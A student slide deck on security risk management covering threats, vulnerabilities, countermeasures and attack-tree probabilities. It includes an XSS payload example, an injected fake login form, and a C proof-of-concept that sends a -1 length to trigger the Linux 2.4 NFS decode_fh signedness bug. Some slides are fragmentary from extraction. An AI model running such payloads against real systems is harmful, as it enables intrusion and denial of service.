Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami.


1 Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami

2 Agenda
• The definition of Risk, and the sections
• Countermeasures in the event of Risk
• How to manage the Risk and probability

3 The definition of Risk and the sections
Risk is the likelihood that a threat exists and can be exploited; what the threat makes use of is called the vulnerability. From this definition, the main sections of risk can be separated:
• Threat: the process of trying to gain access to the organization's confidential information
• Vulnerabilities: weaknesses in the organization through which the attacker can get in

5 Vulnerabilities
Vulnerabilities are of two types:
• Technical Vulnerability: weak hardening of a system; an attack in which the attacker uses such a weakness is known as a technical attack
• Administrative Vulnerability: the attack is the so-called non-technical, or social engineering, attack

6 Vulnerabilities
They can also be divided into two by how easy or difficult they are to exploit:
• High-level Vulnerability: easy to exploit, for example by writing software code that exploits the gap
• Low-level Vulnerability: the more difficult to exploit, requiring a lot of financial resources or a long time from the attacker

7 Example: Vulnerability of XSS (Cross Site Scripting)
(HTML, JavaScript, VBScript, ActiveX, Flash)
Amend the URL address for a given site:
alert('Welcome')
http://www.example.com/search?keyword=

8 Please login with the form below before proceeding: Login: Password:

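10 Vulnerabilities unsigned linux-2.4, signed/unsigned

    static inline u32 *
    decode_fh(u32 *p, struct svc_fh *fhp)
    {
        unsigned int size;

        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);        /* length word taken from the request */
        /* Bounds check: its outcome for a length of 0xFFFFFFFF depends on
         * whether size is signed (-1, passes) or unsigned (rejected). */
        if (size > NFS3_FHSIZE)
            return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
    }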

11 Code

    #include
    #include

    #define NFSPROG 100003
    #define NFSVERS 3
    #define NFSPROC_GETATTR 1

    static struct diropargs heh;

    /* Encodes the 32-bit value -1 in place of the request arguments. */
    bool_t xdr_heh(XDR *xdrs, diropargs *heh)
    {
        int32_t werd = -1;
        return xdr_int32_t(xdrs, &werd);
    }

    int main(void)
    {
        CLIENT *client;
        struct timeval tv;

        client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
        if (client == NULL) {
            perror("clnt_create\n");
            return 1;              /* no client handle to use */
        }
        tv.tv_sec = 3;
        tv.tv_usec = 0;
        client->cl_auth = authunix_create_default();
        clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
                  (xdrproc_t) xdr_void, NULL, tv);
        return 0;
    }
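The length check from slide 10, modelled in user space as an added example (not code from the presentation or from the kernel): it compares a signed and an unsigned `size` on the all-ones length word that slide 11's `werd = -1` encodes to. `FHSIZE`, `struct fh`, `accepts_signed`, `accepts_unsigned` and `decode_fh_checked` are assumed names, and the checked decoder also verifies the remaining request length, which goes beyond the slide.

```c
#include <arpa/inet.h>   /* htonl, ntohl */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FHSIZE 64        /* assumed stand-in for NFS3_FHSIZE */

struct fh { uint32_t size; unsigned char base[FHSIZE]; };  /* hypothetical */

/* Length check with a signed size: 0xFFFFFFFF becomes -1 and passes. */
int accepts_signed(const uint32_t *p) {
    int size = (int)ntohl(*p);
    return !(size > FHSIZE);
}

/* Same check with an unsigned size, as declared on slide 10. */
int accepts_unsigned(const uint32_t *p) {
    unsigned int size = ntohl(*p);
    return !(size > FHSIZE);
}

/* Checked decoder: unsigned length, and the payload must fit in the
 * words that remain in the request. Returns NULL on any violation. */
const uint32_t *decode_fh_checked(const uint32_t *p, size_t words_left,
                                  struct fh *out) {
    if (words_left < 1) return NULL;
    uint32_t size = ntohl(*p++);
    words_left--;
    if (size > FHSIZE) return NULL;
    size_t quads = (size + 3u) / 4u;          /* XDR pads to 4 bytes */
    if (quads > words_left) return NULL;
    memcpy(out->base, p, size);
    out->size = size;
    return p + quads;
}

int main(void) {
    uint32_t minus_one = htonl(0xFFFFFFFFu);  /* constructed: int32 -1 on the wire */
    uint32_t good[3] = { htonl(8), 0x11111111u, 0x22222222u };  /* constructed */
    struct fh f;
    printf("signed check accepts -1:   %d\n", accepts_signed(&minus_one));
    printf("unsigned check accepts -1: %d\n", accepts_unsigned(&minus_one));
    printf("checked decode of -1:      %s\n",
           decode_fh_checked(&minus_one, 1, &f) ? "accepted" : "rejected");
    printf("checked decode of 8 bytes: %s\n",
           decode_fh_checked(good, 3, &f) ? "accepted" : "rejected");
    return 0;
}
```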

12 Threat
There are three essential components of a threat:
• Target
• Agent
• Event

13 Target
The target is the organization's information, and the attacker can act against each of the following:
• Confidentiality: disclosing the confidential information to others
• Integrity: the possibility of changing the organization's information
• Availability: through denial of service (DoS)
• Accountability: the attacker conceals the attack so as not to be punished for it

14 Agents
An agent must have three features:
• Access to the target: this may be direct, through an account with which to enter the system, or indirect, through an intermediary
• Knowledge about the target
• Motivation

15 Events
Events occur in many ways; the most important are misuse of authorized access and unauthorized access to information or the system, for example by placing malicious code (viruses or Trojans) in the systems

16 Countermeasures in the event of Risk
Information, and its importance, varies from one institution to another, and the appropriate action depends on that importance. Intervention may come before a danger occurs, which is called the Proactive Model, or after the danger has occurred, which is called the Reactive Model

17 Countermeasures in the event of Risk
Some examples of countermeasures to a threat or attack:
• Firewalls
• Anti-virus software
• Access Control
• Two-factor authentication systems
• Well-trained employees

18 How to manage the Risk and probability
Steps involved in risk management:
• Risk Analysis
• Decision Management
• Implementation

19 How to manage the Risk and probability
Risk management intervention is divided into two models:
• Reactive Model: a very well-known type, the so-called emotional intervention. For example, a security officer in the company downloads an anti-virus program after a virus has spread and destroyed some devices. The cost can be calculated as follows:
Protection cost = total cost of the risk + the cost of countermeasures

20 How to manage the Risk and probability
• Proactive Model: intervention prior to the risk. This type is much better in terms of cost:
Protection cost = cost of the minimum risk + the cost of countermeasures

21 How to manage the Risk and probability
Calculating the probability of a threat:
• Begin at the top, i.e. in the form of a tree
• Search for the paths that lead to the occurrence of the threat or potential threat
• Combine these paths using (OR, AND)
• To calculate the probability, we start from the top down

22 How to manage the Risk and probability

23 Example
The attacker tries to break the root password. Either the attacker tries to find the root password by guessing (Guessing the root password), or attacks the network as a whole, trying to find bugs in the network. At this point two conditions about the bugs must be met:
1- there are gaps that can be exploited (AND: the second condition must hold with it)
2- the system has not been updated (any potential patch for this gap)

24 How to manage the Risk and probability

25
P(guessing root password = A) = 5/1000 = 0.005
P(exploiting active server = B) = 50/1000 = 0.05 (AND)
P(system is not updated or not configured properly = C) = 0.1

26 How to manage the Risk and probability
Assumptions: guessing the password is A and exploiting the gap is B, the latter applying only if the system is not updated (C).
P(attack service = BC) = P(B) * P(C) = 0.05 * 0.1 = 0.005 (AND)
P(break-in) = P(A) + P(BC) - P(A) P(BC) = 0.005 + 0.005 - 0.005 * 0.005 = 0.009975 (OR)
Total probability of break-in: 0.009975.
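The calculation on slides 25 and 26 as a small attack-tree evaluator, added here as an example (not part of the original presentation); it generalizes the slide's two-branch OR to any number of children, assuming the events are independent. `struct node`, `tree_prob` and `approx_eq` are assumed names.

```c
#include <stddef.h>
#include <stdio.h>

enum kind { LEAF, AND, OR };

struct node {                       /* hypothetical attack-tree node */
    enum kind kind;
    const char *label;
    double p;                       /* used by LEAF nodes only */
    size_t nkids;
    const struct node *kids[4];
};

/* Probability of a node, assuming its children are independent events:
 * AND = product of children, OR = 1 - product of (1 - child). For two
 * children OR reduces to P(A) + P(B) - P(A)P(B), the slide's formula. */
double tree_prob(const struct node *n) {
    if (n->kind == LEAF) return n->p;
    double acc = 1.0;
    for (size_t i = 0; i < n->nkids; i++) {
        double pk = tree_prob(n->kids[i]);
        acc *= (n->kind == AND) ? pk : 1.0 - pk;
    }
    return (n->kind == AND) ? acc : 1.0 - acc;
}

/* Tolerant comparison for floating-point results. */
int approx_eq(double a, double b) {
    double d = a - b;
    return d < 1e-12 && d > -1e-12;
}

/* The tree from slides 23 to 26, with the slide's probabilities. */
static const struct node A  = { LEAF, "guess root password", 5.0 / 1000, 0, { NULL } };
static const struct node B  = { LEAF, "exploit active server", 50.0 / 1000, 0, { NULL } };
static const struct node C  = { LEAF, "system not updated or misconfigured", 0.1, 0, { NULL } };
static const struct node BC = { AND, "attack service", 0.0, 2, { &B, &C } };
static const struct node BREAK_IN = { OR, "break-in", 0.0, 2, { &A, &BC } };

int main(void) {
    printf("P(%s) = %g\n", BC.label, tree_prob(&BC));
    printf("P(%s) = %g\n", BREAK_IN.label, tree_prob(&BREAK_IN));
    return 0;
}
```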
